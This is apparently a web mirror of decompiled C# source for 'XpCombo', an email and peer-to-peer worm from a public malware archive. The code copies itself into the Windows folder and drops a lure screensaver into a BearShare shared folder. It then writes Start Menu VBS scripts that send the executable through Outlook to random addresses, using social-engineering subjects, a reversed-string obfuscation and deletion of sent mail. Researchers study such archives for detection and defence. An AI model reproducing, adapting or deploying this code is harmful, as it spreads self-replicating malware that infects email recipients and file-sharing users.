mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
266 lines
11 KiB
C#
266 lines
11 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Module1
|
|||
|
// Assembly: XpCombo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 3FCA07A7-B1C6-4879-B2D5-DAEB4F710028
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
|
|||
|
[StandardModule]
|
|||
|
internal sealed class Module1
|
|||
|
{
|
|||
|
private static string filnam = "xpc1";
|
|||
|
private static string v = " ";
|
|||
|
private static string i;
|
|||
|
private static string p;
|
|||
|
private static string u;
|
|||
|
private static int t = 1;
|
|||
|
private static string o;
|
|||
|
private static string k = ".vbs";
|
|||
|
private static int l = 0;
|
|||
|
private static string m;
|
|||
|
private static string[] a = new string[11];
|
|||
|
private static string[] b = new string[11];
|
|||
|
private static string c;
|
|||
|
private static string[] d = new string[51];
|
|||
|
private static string[] e = new string[6];
|
|||
|
private static string[] h = new string[69];
|
|||
|
private static string[] f = new string[4];
|
|||
|
private static string[] g = new string[4];
|
|||
|
private static string q;
|
|||
|
private static string x;
|
|||
|
private static string y;
|
|||
|
private static string z;
|
|||
|
private static string r;
|
|||
|
private static Module xp = Assembly.GetExecutingAssembly().GetModules()[0];
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void main()
|
|||
|
{
|
|||
|
Module1.i = "Owner";
|
|||
|
Module1.o = Environment.UserName;
|
|||
|
if (StringType.StrCmp(Module1.o, Module1.i, false) == 0 | File.Exists("C:\\windows\\fr8i.exe"))
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) "You have been infected by XpCombo Worm Created By LoTti");
|
|||
|
Module1.full();
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
FileSystem.FileCopy(Module1.xp.FullyQualifiedName, "" + Module1.filnam);
|
|||
|
FileSystem.FileCopy(Module1.filnam, "C:\\Windows\\fr8i.exe");
|
|||
|
if (StringType.StrCmp(FileSystem.Dir("c:\\program files\\BearShare\\my shared folder", FileAttribute.Directory), "", false) == 0)
|
|||
|
FileSystem.MkDir("c:\\program files\\BearShare\\my shared folder");
|
|||
|
FileSystem.FileCopy(Module1.filnam, "C:\\Program Files\\BearShare\\my shared folder\\Angelina Jolie.scr");
|
|||
|
Module1.t = 1;
|
|||
|
do
|
|||
|
{
|
|||
|
checked { ++Module1.l; }
|
|||
|
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
|
|||
|
Module1.d[0] = "\"joan";
|
|||
|
Module1.d[1] = "\"michelle";
|
|||
|
Module1.d[2] = "\"brian";
|
|||
|
Module1.d[3] = "\"sinead";
|
|||
|
Module1.d[4] = "\"mary";
|
|||
|
Module1.d[5] = "\"sonia";
|
|||
|
Module1.d[6] = "\"damien";
|
|||
|
Module1.d[7] = "\"caoibhe";
|
|||
|
Module1.d[8] = "\"kevin";
|
|||
|
Module1.d[9] = "\"aishling";
|
|||
|
Module1.d[10] = "\"maree";
|
|||
|
Module1.d[11] = "\"nicola";
|
|||
|
Module1.d[12] = "\"debbie";
|
|||
|
Module1.d[13] = "\"susan";
|
|||
|
Module1.d[14] = "\"naoimh";
|
|||
|
Module1.d[15] = "\"bridget";
|
|||
|
Module1.d[16] = "\"declan";
|
|||
|
Module1.d[17] = "\"nuala";
|
|||
|
Module1.d[18] = "\"micheal";
|
|||
|
Module1.d[19] = "\"anthony";
|
|||
|
Module1.d[20] = "\"joseph";
|
|||
|
Module1.d[21] = "\"james";
|
|||
|
Module1.d[22] = "\"keirin";
|
|||
|
Module1.d[23] = "\"john";
|
|||
|
Module1.d[24] = "\"ronan";
|
|||
|
Module1.d[25] = "\"gavin";
|
|||
|
Module1.d[26] = "\"david";
|
|||
|
Module1.d[27] = "\"peter";
|
|||
|
Module1.d[28] = "\"steven";
|
|||
|
Module1.d[29] = "\"colin";
|
|||
|
Module1.d[30] = "\"katie";
|
|||
|
Module1.d[31] = "\"kathy";
|
|||
|
Module1.d[32] = "\"noirin";
|
|||
|
Module1.d[33] = "\"julia";
|
|||
|
Module1.d[34] = "\"julie";
|
|||
|
Module1.d[35] = "\"wayne";
|
|||
|
Module1.d[36] = "\"sean";
|
|||
|
Module1.d[37] = "\"shaun";
|
|||
|
Module1.d[38] = "\"shane";
|
|||
|
Module1.d[39] = "\"linda";
|
|||
|
Module1.d[40] = "\"tanya";
|
|||
|
Module1.d[41] = "\"tammy";
|
|||
|
Module1.d[42] = "\"abbey";
|
|||
|
Module1.d[43] = "\"robyn";
|
|||
|
Module1.d[44] = "\"robert";
|
|||
|
Module1.d[45] = "\"rachel";
|
|||
|
Module1.d[46] = "\"naoimi";
|
|||
|
Module1.d[47] = "\"natalie";
|
|||
|
Module1.d[48] = "\"lauren";
|
|||
|
Module1.d[49] = "\"gerard";
|
|||
|
Module1.d[50] = "\"vincent";
|
|||
|
Module1.h[0] = "1";
|
|||
|
Module1.h[1] = "1995";
|
|||
|
Module1.h[2] = "1996";
|
|||
|
Module1.h[3] = "1997";
|
|||
|
Module1.h[4] = "1998";
|
|||
|
Module1.h[5] = "1999";
|
|||
|
Module1.h[6] = "2000";
|
|||
|
Module1.h[7] = "2003";
|
|||
|
Module1.h[8] = "keane";
|
|||
|
Module1.h[9] = "obrien";
|
|||
|
Module1.h[10] = "kelly";
|
|||
|
Module1.h[11] = "oreilly";
|
|||
|
Module1.h[12] = "whelan";
|
|||
|
Module1.h[13] = "linnane";
|
|||
|
Module1.h[14] = "haze";
|
|||
|
Module1.h[15] = "oneill";
|
|||
|
Module1.h[16] = "mcnamara";
|
|||
|
Module1.h[17] = "heinz";
|
|||
|
Module1.h[18] = "hally";
|
|||
|
Module1.h[19] = "mcmahon";
|
|||
|
Module1.h[20] = "lynch";
|
|||
|
Module1.h[21] = "carthy";
|
|||
|
Module1.h[22] = "osullivan";
|
|||
|
Module1.h[23] = "larkin";
|
|||
|
Module1.h[24] = "walshe";
|
|||
|
Module1.h[25] = "clancy";
|
|||
|
Module1.h[26] = "nolan";
|
|||
|
Module1.h[27] = "griffin";
|
|||
|
Module1.h[28] = "casey";
|
|||
|
Module1.h[29] = "oconnell";
|
|||
|
Module1.h[30] = "odonnell";
|
|||
|
Module1.h[31] = "chambers";
|
|||
|
Module1.h[32] = "mulqueen";
|
|||
|
Module1.h[33] = "mulcare";
|
|||
|
Module1.h[34] = "coyne";
|
|||
|
Module1.h[35] = "kerse";
|
|||
|
Module1.h[36] = "burke";
|
|||
|
Module1.h[37] = "mcinerney";
|
|||
|
Module1.h[38] = "talty";
|
|||
|
Module1.h[39] = "mcswiggan";
|
|||
|
Module1.h[40] = "brown";
|
|||
|
Module1.h[41] = "given";
|
|||
|
Module1.h[42] = "mcgibney";
|
|||
|
Module1.h[43] = "coffey";
|
|||
|
Module1.h[44] = "quealy";
|
|||
|
Module1.h[45] = "";
|
|||
|
Module1.h[46] = "odea";
|
|||
|
Module1.h[47] = "oshea";
|
|||
|
Module1.h[48] = "ryan";
|
|||
|
Module1.h[49] = "troy";
|
|||
|
Module1.h[50] = "welsh";
|
|||
|
Module1.h[51] = "neylon";
|
|||
|
Module1.h[52] = "barrett";
|
|||
|
Module1.h[53] = "lavrey";
|
|||
|
Module1.h[54] = "ginnane";
|
|||
|
Module1.h[55] = "hopkins";
|
|||
|
Module1.h[56] = "hoskins";
|
|||
|
Module1.h[57] = "carey";
|
|||
|
Module1.h[58] = "king";
|
|||
|
Module1.h[59] = "thompson";
|
|||
|
Module1.h[60] = "bronson";
|
|||
|
Module1.h[61] = "grogan";
|
|||
|
Module1.h[62] = "meeney";
|
|||
|
Module1.h[63] = "monaghan";
|
|||
|
Module1.h[64] = "moroney";
|
|||
|
Module1.h[65] = "lohan";
|
|||
|
Module1.h[66] = "lucas";
|
|||
|
Module1.h[67] = "healey";
|
|||
|
Module1.h[67] = "";
|
|||
|
Module1.h[68] = "crowley";
|
|||
|
Module1.e[0] = "@yahoo.co.uk\"";
|
|||
|
Module1.e[1] = "@hotmail.com\"";
|
|||
|
Module1.e[2] = "@yahoo.co.uk\"";
|
|||
|
Module1.e[3] = "@hotmail.com\"";
|
|||
|
Module1.e[4] = "@yahoo.co.uk\"";
|
|||
|
Module1.e[5] = "@hotmail.com\"";
|
|||
|
Module1.x = Module1.d[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 7.0 + (double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 11.0 + (double) VBMath.Rnd() * 1.0 + (double) VBMath.Rnd() * 19.0)))];
|
|||
|
Module1.y = Module1.e[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 5f)))];
|
|||
|
Module1.q = Module1.h[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 16.0 + (double) VBMath.Rnd() * 4.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 10.0)))];
|
|||
|
Module1.z = Module1.x + Module1.q + Module1.y;
|
|||
|
Module1.a[0] = "\"Oh my god\"";
|
|||
|
Module1.a[1] = "\"Your document\"";
|
|||
|
Module1.a[2] = "\"Heres the file\"";
|
|||
|
Module1.a[3] = "\"The passwords\"";
|
|||
|
Module1.a[4] = "\"Thanks for this\"";
|
|||
|
Module1.a[5] = "\"you have to see it\"";
|
|||
|
Module1.a[6] = "\"look at this\"";
|
|||
|
Module1.a[7] = "\"this is mad\"";
|
|||
|
Module1.a[8] = "\"hi how are you\"";
|
|||
|
Module1.a[9] = "\"Whats the Story\"";
|
|||
|
Module1.a[10] = "\"Here it is i think\"";
|
|||
|
Module1.b[0] = "\"Yeah here it is i found it last nite\"";
|
|||
|
Module1.b[1] = "\"Do you want it or not\"";
|
|||
|
Module1.b[2] = "\"This is the best i have seen yet\"";
|
|||
|
Module1.b[3] = "\"Well i havent got much time but here it is\"";
|
|||
|
Module1.b[4] = "\"I didnt have much time to look at it but here take it\"";
|
|||
|
Module1.b[5] = "\"I got this from a friend\"";
|
|||
|
Module1.b[6] = "\"Do you want this file\"";
|
|||
|
Module1.b[7] = "\"I cant believe i had this\"";
|
|||
|
Module1.b[8] = "\"Try it and tell me what you think\"";
|
|||
|
Module1.b[9] = "\"I think you asked me for this if not just delete it\"";
|
|||
|
Module1.b[10] = "\"Heres the file you asked for\"";
|
|||
|
Module1.c = Strings.StrReverse(")0(metIetaerC.ppAkooltuO");
|
|||
|
Module1.g[0] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
|
|||
|
Module1.g[1] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
|
|||
|
Module1.g[2] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
|
|||
|
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
|
|||
|
streamWriter.WriteLine("On Error Resume Next");
|
|||
|
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
|
|||
|
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
|
|||
|
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
|
|||
|
streamWriter.WriteLine("OutlookEmail.Importance = 1");
|
|||
|
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
|
|||
|
streamWriter.WriteLine("OutlookEmail.Send");
|
|||
|
streamWriter.WriteLine("End If");
|
|||
|
streamWriter.Close();
|
|||
|
checked { ++Module1.t; }
|
|||
|
}
|
|||
|
while (Module1.t <= 50);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void full()
|
|||
|
{
|
|||
|
Module1.t = 1;
|
|||
|
do
|
|||
|
{
|
|||
|
checked { ++Module1.l; }
|
|||
|
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
|
|||
|
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
|
|||
|
streamWriter.WriteLine("On Error Resume Next");
|
|||
|
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
|
|||
|
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
|
|||
|
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
|
|||
|
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
|
|||
|
streamWriter.WriteLine("OutlookEmail.Importance = 1");
|
|||
|
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
|
|||
|
streamWriter.WriteLine("OutlookEmail.Send");
|
|||
|
streamWriter.WriteLine("End If");
|
|||
|
streamWriter.Close();
|
|||
|
checked { ++Module1.t; }
|
|||
|
}
|
|||
|
while (Module1.t <= 3600);
|
|||
|
}
|
|||
|
}
|